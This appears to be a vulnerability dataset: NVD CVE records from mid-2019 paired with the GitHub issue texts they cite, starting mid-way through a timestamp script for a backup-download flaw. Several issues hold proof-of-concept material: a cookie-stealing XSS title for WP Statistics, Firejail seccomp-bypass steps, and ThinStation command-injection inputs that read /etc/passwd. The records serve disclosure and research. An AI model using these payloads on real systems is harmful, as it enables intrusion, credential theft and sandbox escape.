(s>0 and s<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time())) elif h==0 and s==0 and (i>0 and i<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time())) elif h==0 and i==0 and (s>=10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time())) #print(data) elif h==0 and (i>0 and i<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time())) #print(data) elif h==0 and (i>0 and i<10) and (s>0 and s<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time())) # print(data) elif h==0 and (i>0 and i<10) and (s>0 and s<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time())) #print(data) elif (h>0 and h<10) and (i>0 and i<10) and (s>0 and s<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time())) #print(data) elif (h>0 and h<10) and (s>0 and s<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+str(i)+'0'+str(s),time.localtime(time.time())) #print(data) elif (h>0 and h<10) and (s>0 and s<10) and (i>0 and i<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time())) #print(data) else: data=time.strftime('D%Y%m%dT'+str(h)+str(i)+str(s),time.localtime(time.time())) print(data) ![image](https://user-images.githubusercontent.com/50904323/58160303-c56f3a00-7cb0-11e9-8104-0a45ec9c99ac.png)
Invalid identity authentication vulnerability, any user can view the download database backup file
https://api.github.com/repos/srsec/-srsec-/issues/1/comments
1
2019-05-22T08:41:54Z
2019-07-29T05:11:06Z
https://github.com/srsec/-srsec-/issues/1
447,006,539
1
411
CVE-2019-12566
2019-06-03T00:29:00.263
The WP Statistics plugin through 12.6.5 for Wordpress has stored XSS in includes/class-wp-statistics-pages.php. This is related to an account with the Editor role creating a post with a title that contains JavaScript, to attack an admin user.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wp-statistics/wp-statistics/commit/aec4359975344f75385ae1ec257575d8131d6ec2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/wp-statistics/wp-statistics/issues/271" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://wordpress.org/plugins/wp-statistics/#developers" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wp-statistics/wp-statistics/commit/aec4359975344f75385ae1ec257575d8131d6ec2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/wp-statistics/wp-statistics/issues/271" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://wordpress.org/plugins/wp-statistics/#developers" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*", "matchCriteriaId": "8103C017-B41E-4301-A65E-A8D702EE5F57", "versionEndExcluding": null, "versionEndIncluding": "12.6.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wp-statistics/wp-statistics/issues/271
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "wp-statistics", "wp-statistics" ]
I was testing on : - Wordpress 5.2.1 - WP Statistic 12.6.5 Account with Editor role can create Post with Title that contain javascript/html. For example : `<script>alert(document.cookie)</script>` ![image](https://user-images.githubusercontent.com/12135974/58610016-1c3dca80-82d4-11e9-8edd-145e4559aa9d.png) WP statistics page that use these title will got affected for xss attack, for example : overviews, pages,... ![image](https://user-images.githubusercontent.com/12135974/58610055-4d1dff80-82d4-11e9-880c-0dbe26156e77.png) Even if the Editor delete the Post, but it still remain in top 10 page that got most hit, the Overviews page still be affected. So in reality, attacker that controls the Editor account can create page with title that contains maclious javascript code that steal admin cookie (for example), visit it a lot that make it be in top 10 page most visited, delete the post so admin wont notice the weird post that have javascript in title. And when admin click on Overviews page of WP Statistic, his cookie will be stolen.
Page's title should be encoded or filtering html entities/javascript code
https://api.github.com/repos/wp-statistics/wp-statistics/issues/271/comments
6
2019-05-30T05:14:25Z
2019-06-04T07:58:32Z
https://github.com/wp-statistics/wp-statistics/issues/271
450,133,639
271
412
CVE-2019-12589
2019-06-03T03:29:00.320
In Firejail before 0.9.60, seccomp filters are writable inside the jail, leading to a lack of intended seccomp restrictions for a process that is joined to the jail after a filter has been modified by an attacker.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netblue30/firejail/commit/eecf35c2f8249489a1d3e512bb07f0d427183134" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/netblue30/firejail/issues/2718" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/netblue30/firejail/releases/tag/0.9.60" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CDY7B73YDRBURA25APSHD5PFEO4TNSFW/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGVULJ6IKVDO6UAVIQRHQVSKOUD6QDWM/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netblue30/firejail/commit/eecf35c2f8249489a1d3e512bb07f0d427183134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/netblue30/firejail/issues/2718" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/netblue30/firejail/releases/tag/0.9.60" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CDY7B73YDRBURA25APSHD5PFEO4TNSFW/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGVULJ6IKVDO6UAVIQRHQVSKOUD6QDWM/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:firejail_project:firejail:*:*:*:*:-:*:*:*", "matchCriteriaId": "D201C371-BB17-4E90-8125-740E84785DE4", "versionEndExcluding": "0.9.60", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/netblue30/firejail/issues/2718
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "netblue30", "firejail" ]
seccomp filters are copied into `/run/firejail/mnt`, and are writable within the jail. A malicious process can modify files from inside the jail. Processes that are later joined to the jail will not have seccomp filters applied. ## repro steps compile program to call blacklisted syscall ``` gcc -xc - <<EOF #include <stdio.h> #include <sys/klog.h> int main(void) { printf("calling syslog syscall\n"); klogctl(1, NULL, 0); printf("not killed\n"); } EOF ``` create interactive jail session ```bash $ firejail --quiet --name=jail ``` try to run program inside jail, noting syscall is blocked ```bash $ ./a.out calling syslog syscall Bad system call (core dumped) ``` open new terminal and run program by joining jail, noting syscall is blocked ```bash $ firejail --quiet --join=jail ./a.out calling syslog syscall ``` back in original interactive jail session, empty the seccomp.list file and attempt to run program, noting syscall is blocked ```bash $ echo -n "" > /run/firejail/mnt/seccomp.list $ ./a.out calling syslog syscall Bad system call (core dumped) ``` open new terminal and run program by joining jail, noting syscall is *NOT* blocked ```bash $ firejail --quiet --join=jail ./a.out calling syslog syscall not killed ```
seccomp bypass when joining existing jail
https://api.github.com/repos/netblue30/firejail/issues/2718/comments
27
2019-05-21T08:36:14Z
2019-06-08T18:00:38Z
https://github.com/netblue30/firejail/issues/2718
446,487,530
2,718
413
CVE-2019-12728
2019-06-04T13:29:00.590
Grails before 3.3.10 used cleartext HTTP to resolve the SDKMan notification service. NOTE: users' apps were not resolving dependencies over cleartext HTTP.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/grails/grails-core/issues/11250" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://objectcomputing.com/news/2019/05/30/possible-grails-mitm-vulnerability" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/grails/grails-core/issues/11250" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://objectcomputing.com/news/2019/05/30/possible-grails-mitm-vulnerability" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:grails:grails:*:*:*:*:*:*:*:*", "matchCriteriaId": "918A84B3-E1D0-47CD-B2D6-BB7641DA3105", "versionEndExcluding": "3.3.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "494" ]
494
https://github.com/grails/grails-core/issues/11250
[ "Exploit", "Third Party Advisory" ]
github.com
[ "grails", "grails-core" ]
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html) [CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html) The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS v3.0 Base Score of 8.1/10 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H ### This isn't just theoretical POC code has existed since 2014 to maliciously compromise a JAR file inflight. See: * https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/ * https://github.com/mveytsman/dilettante ### MITM Attacks Increasingly Common See: * https://serverfault.com/a/153065 * https://security.stackexchange.com/a/12050 ### Source Locations - https://github.com/grails/grails-core/blob/92304cbfc3a347808d5b8cd589aedb8914fd96cf/build.gradle#L5 ### Public Disclosure #### Option 1: File for a CVE A project maintainer for this project should probably file for a CVE number to inform the public about this vulnerability in the build for this project. The goal is to inform the public that there was a potential for published build artifacts to have been maliciously compromised in earlier releases. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: [cve.mitre.org/cve/request_id.html](https://cve.mitre.org/cve/request_id.html) Otherwise, an open source CVE should be filed for here: [iwantacve.org](https://iwantacve.org/) #### Option 2: Manually validate the release artifacts If this project's build is [fully reproducible](https://en.wikipedia.org/wiki/Reproducible_builds). An alternative to filing for a CVE is to go back and build the earlier releases (with the HTTPS patch applied) to confirm the artifacts were not tampered when they were built. This can be done by comparing the hashes of the artifacts built locally with the ones published. If the hashes of all previous artifacts match those that are published, you can safely assume that the releases were not tampered with. Again, this assumes that the build if fully reproducible and will require significantly more work.
[SECURITY] Releases are built/executed/released in the context of insecure/untrusted code
https://api.github.com/repos/apache/grails-core/issues/11250/comments
21
2019-02-19T21:52:47Z
2022-11-20T20:05:35Z
https://github.com/apache/grails-core/issues/11250
412,141,731
11,250
414
CVE-2019-12732
2019-06-06T15:29:01.030
The Chartkick gem through 3.1.0 for Ruby allows XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.6, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 1.6, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://github.com/ankane/chartkick/blob/master/CHANGELOG.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ankane/chartkick/issues/488" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://github.com/ankane/chartkick/blob/master/CHANGELOG.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ankane/chartkick/issues/488" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chartkick_project:chartkick:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "64BAA589-ABFA-46B8-AE08-3F60098AB9A1", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ankane/chartkick/issues/488
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ankane", "chartkick" ]
Under certain conditions, the Chartkick Ruby gem is vulnerable to a cross-site scripting (XSS) attack. This vulnerability has been assigned the CVE identifier CVE-2019-12732. Versions Affected: 3.1.0 and below Fixed Versions: 3.2.0 ## Impact Chartkick is vulnerable to a cross-site scripting (XSS) attack if BOTH the following conditions are met: Condition 1: It's used with `ActiveSupport.escape_html_entities_in_json = false` (this is not the default for Rails) OR used with a non-Rails framework like Sinatra. Condition 2: Untrusted data or options are passed to a chart. ```erb <%= line_chart params[:data], min: params[:min] %> ``` Note that your database can also contain untrusted data. ```erb <%= column_chart Visit.group(:user_agent).count %> ``` All users running an affected release should upgrade immediately.
XSS Vulnerability in Chartkick Ruby Gem
https://api.github.com/repos/ankane/chartkick/issues/488/comments
0
2019-06-04T19:07:47Z
2019-07-05T18:52:34Z
https://github.com/ankane/chartkick/issues/488
452,159,653
488
415
CVE-2019-12760
2019-06-06T19:29:00.500
A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.6, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 0.7, "impactScore": 2.5, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/davidhalter/parso/issues/75" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/davidhalter/parso/issues/75" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:parso_project:parso:*:*:*:*:*:*:*:*", "matchCriteriaId": "B538BE6F-AEC7-4E13-BDDF-7442A2958EC5", "versionEndExcluding": null, "versionEndIncluding": "0.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/davidhalter/parso/issues/75
null
github.com
[ "davidhalter", "parso" ]
**Vulnerability Description** : See [CVE-2019-12760](https://nvd.nist.gov/vuln/detail/CVE-2019-12760) **Note** : Let us be honest, this should be very unlikely to be exploitable in the wild.
Deserialization vulnerability (CVE-2019-12760)
https://api.github.com/repos/davidhalter/parso/issues/75/comments
37
2019-06-11T08:51:37Z
2019-07-13T13:54:29Z
https://github.com/davidhalter/parso/issues/75
454,561,153
75
416
CVE-2019-12771
2019-06-07T14:29:00.307
Command injection is possible in ThinStation through 6.1.1 via shell metacharacters after the cgi-bin/CdControl.cgi action= substring, or after the cgi-bin/VolControl.cgi OK= substring.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Thinstation/thinstation/issues/427" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Thinstation/thinstation/issues/427" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinstation_project:thinstation:*:*:*:*:*:*:*:*", "matchCriteriaId": "D90EFCB4-24AA-4E8F-AF49-FF57F2574F85", "versionEndExcluding": null, "versionEndIncluding": "6.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/Thinstation/thinstation/issues/427
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Thinstation", "thinstation" ]
The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi-bin/CdControl.cgi and /cgi-bin/VolControl.cgi. PoC: /cgi-bin/CdControl.cgi: action=;id eject;ifconfig back;ls -alt forward;whoami pause;hostname /cgi-bin/VolControl.cgi: OK=;cat /etc/passwd Please patch asap. Does affect latest version. For more information read: https://www.owasp.org/index.php/Command_Injection
CGI Generic Command Execution
https://api.github.com/repos/Thinstation/thinstation/issues/427/comments
5
2019-06-06T23:12:21Z
2019-06-17T04:18:32Z
https://github.com/Thinstation/thinstation/issues/427
453,276,017
427
417
CVE-2019-12779
2019-06-07T20:29:00.857
libqb before 1.0.5 allows local users to overwrite arbitrary files via a symlink attack, because it uses predictable filenames (under /dev/shm and /tmp) without O_EXCL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 6.6, "confidentialityImpact": "NONE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 9.2, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00017.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00027.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00031.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/108691" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2019:3610" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory", "VDB Entry" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1695948" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ClusterLabs/libqb/issues/338" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ClusterLabs/libqb/releases/tag/v1.0.4" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ClusterLabs/libqb/releases/tag/v1.0.5" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202107-03" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00031.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/108691" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2019:3610" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory", "VDB Entry" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1695948" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ClusterLabs/libqb/issues/338" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ClusterLabs/libqb/releases/tag/v1.0.4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ClusterLabs/libqb/releases/tag/v1.0.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202107-03" } ]
